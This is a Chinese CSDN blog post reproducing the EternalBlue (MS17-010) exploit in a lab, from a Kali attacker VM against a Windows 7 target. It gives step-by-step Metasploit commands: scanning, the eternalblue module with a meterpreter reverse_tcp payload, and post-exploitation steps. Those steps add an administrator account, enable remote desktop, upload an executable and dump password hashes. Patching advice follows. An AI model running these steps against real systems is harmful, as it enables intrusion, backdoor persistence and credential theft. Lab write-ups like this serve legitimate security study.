Windows下永恒之蓝(MS17-010)漏洞的复现分析

最新推荐文章于 2024-07-25 15:05:50 发布
最新推荐文章于 2024-07-25 15:05:50 发布
阅读量1.9k 收藏 8
点赞数 4
分类专栏: 漏洞分析 文章标签: windows 网络 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51331767/article/details/128651441
版权

一、漏洞简介

1、爆发于17年左右,一种名为WannaCry(永恒之蓝)的电脑勒索病毒,基于SMB协议,利用开放TCP445端口的机器进行攻击,只要机主开机联网,就可通过漏洞来控制主机,植入木马,窃取用户隐私,进行勒索。

2、影响版本:Windows xp,Windows 2003,Windows 7、Windows 8,Windows 2008,Windows 2008 R2、Windows Server 2012等

二、复现环境

攻击机:kali-linux-2021(ip地址192.168.110.3)

靶机:windows7(ip地址192.168.110.133)

三、漏洞复现

    • 确保靶机开启445端口,使用kali自带的nmap对靶机进行扫描

nmap 192.168.110.133

    • 输入命令msfconsole,启动kali自带的msf

3.根据漏洞名称搜索 : search ms17-010

    • 运用辅助模块扫描目标

设置模块:use auxiliary/scanner/smb/smb_ms17_010

查看设置:options

设置目标地址:set rhosts 192.168.110.133

设置好了之后,run或者exploit 进行攻击

绿色的加号为可攻击

    • 设置攻击模块对目标进行攻击

使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

查看所需设置:options

设置目标地址:set RHOSTS 192.168.110.133

设置目标端口:set RPORT 445(默认)

设置payload:set payload windows/x64/meterpreter/reverse_tcp(默认)

设置本地地址:set LHOST 192.168.110.3(默认)

攻击:run或者exploit

成功建立会话

查看目前权限,为系统权限

使用shell进入命令窗口(输入chcp 65001解决乱码问题)

创建新用户wang 123并加入管理员组

在meterpreter 界面输入 run getgui -e 开启目标靶机的远程桌面

screenshot #可以对靶机屏幕截图

使用upload 上传文件

upload /home/kali/桌面/Server.exe C:\\Windows

其他命令:

sysinfo #查看靶机信息

ipconfig #查看靶机网络配置

ifconfig #查看靶机网络配置

ps #查看靶机正在运行的进程

Hashdump#下载靶机的用户hash

四、漏洞解决方法

  1. 对系统进行升级或打补丁

2.开启防火墙,安装其他杀毒工具

3.关闭相应的端口

吃我灰流丽
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
永恒之蓝 MS17-010漏洞复现
春日野穹
12-21 1654
目录导航 一. 复现环境 二. 漏洞原理 1.漏洞简介 2.漏洞原理代码详解 三. 漏洞复现 1.信息收集 2.漏洞探测 3.漏洞利用 一. 复现环境 工具:msf 攻击机:Kali linux 虚拟机一台 ip: 169.254.93.24 测试机:Windows 2008 r2 虚拟机一台 ip: 169.254.93.243 网络环境:手机WiFi网络USB共享,同一局域网,桥接网络模...
永恒之蓝漏洞原理/永恒之蓝 MS17-010漏洞复现_零基础渗透指南
程序员三九的博客
06-25 605
利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限,是一种使用MSF 实现 “永恒之蓝”的快速攻击。
MS17-010(Eternal blue永恒之蓝漏洞利用+修复方法
记录学习
06-21 2218
msf永恒之蓝漏洞复现过程以及修复建议
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现
Zichel77的博客
10-06 2492
发现445端口打开,SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播,因此可以加以利用。这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本。Windows下IP地址为192.168.92.136。就可以看到windows7电脑中新建了这么个文件。看到WIN才说明利用成功,FAIL就是失败。使用的是nmap模块,输入命令进行扫描。开启了两台虚拟机,保证在同一网段下。两台虚拟机在同一网段,故可保持通信。我没这个病毒就不传了哈哈哈哈哈。
永恒之蓝MS17-010漏洞复现(图文版 超详细!)
weixin_48886225的博客
12-04 629
使用MSF复现永恒之蓝MS17-010
MS17-010漏洞复现+利用
Nove1205的博客
07-22 1084
MS17-010漏洞复现+利用 文章内容仅供学习参考,若用于非法途径,触犯法律后果自负,本人概不负责!!!
永恒之蓝漏洞复现(ms17-010)
热门推荐
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
永恒之蓝ms17-010漏洞复现
qq_63092550的博客
11-16 306
运行成功后会出现meterpreter> ,Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,对目标系统进行更深入的渗透,如进入cmd、获取屏幕、上传/下载文件、创建持久后门等。meterpreter > run post/windows/manage/enable_rdp //启用目标主机的3389端口远程桌面。meterpreter > idletime //查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。
漏洞复现】利用msf复现永恒之蓝ms17-010漏洞
weixin_46022776的博客
04-30 290
利用msf复现永恒之蓝ms17-010漏洞
永恒之蓝MS17-010漏洞复现
huangyongkang666的博客
03-27 4668
永恒之蓝MS17-010漏洞复现 1.永恒之蓝简介 ​ 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服
永恒之蓝MS17-010漏洞复现
tubug的博客
05-21 5695
2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢复文件。.........
18.jdk源码阅读之CopyOnWriteArrayList
前端、移动端、后端源码级底层原理分享
07-25 707
CopyOnWriteArrayList 是 Java 中的一种线程安全的 List 实现,基于“写时复制”(Copy-On-Write)机制。
【力扣练习题】C语言答案
m0_65146517的博客
07-24 611
4、判断两数大小,p小于等于q返回p,p->next递归调用函数。2、遍历判断两个链表的单个值,用尾插法将小的值代入链表。1、如果q为NULL,p为NULL;3、如果遇到大于100000的数则返回true;5、否则返回q,q->next递归调用函数。1、将所有遍历过的值全部替换为100001。2、判断如果遇到NULL则返回false。3、如果p为NULL,返回 q;2、如果q为NULL,返回p;
Java 中集合的练习
最新发布
m0_46977298的博客
07-25 302
需求:定义一个Map集合,键用表示省份名称province,值表示市city,但是市会有多个。分析:使用remove方法模拟点到的学生,并将其添加到一个新的集合中,点名结束后重新将其赋给原始集合,再次循环。需求:班级里有N个学生,被点到的学生不会再被点到。需求:班级里有N个学生。要求在随机的时候,70%的概率随机到男生,30%的概率随机到女生。江苏省 = 南京市,扬州市,苏州市,无锡市,常州市。湖北省 = 武汉市,孝感市,十堰市,宜昌市,鄂州市。需求:班级里有N个学生,实现随机点名器。
利用Metasploit的永恒之蓝漏洞渗透win10
05-02
在使用Metasploit渗透测试工具之前,需要先了解一些基础知识。永恒之蓝漏洞是一个远程代码执行漏洞,它利用了Windows SMB v1协议中的一个缓冲区溢出漏洞。该漏洞可以使攻击者通过网络获取Windows系统的控制权,而无需进行身份验证。 以下是使用Metasploit进行永恒之蓝漏洞渗透win10的步骤: 1. 首先,需要确定目标机器的IP地址和操作系统版本。可以使用nmap或其他扫描工具进行扫描。 2. 打开Kali Linux终端,输入msfconsole命令打开Metasploit控制台。 3. 在Metasploit控制台中输入search eternalblue,选择对应的exploit模块进行利用。 4. 设置目标机器的IP地址,以及目标机器的操作系统版本。 5. 输入run命令开始攻击,Metasploit会自动进行漏洞利用尝试。 6. 如果攻击成功,将会得到一个反向Shell,可以使用该Shell进行后续操作。 需要注意的是,永恒之蓝漏洞是一个非常危险的漏洞,使用Metasploit进行渗透测试时需要遵守相关法律法规,以及遵守渗透测试的道德规范。建议只在合法授权的情况下使用Metasploit进行渗透测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值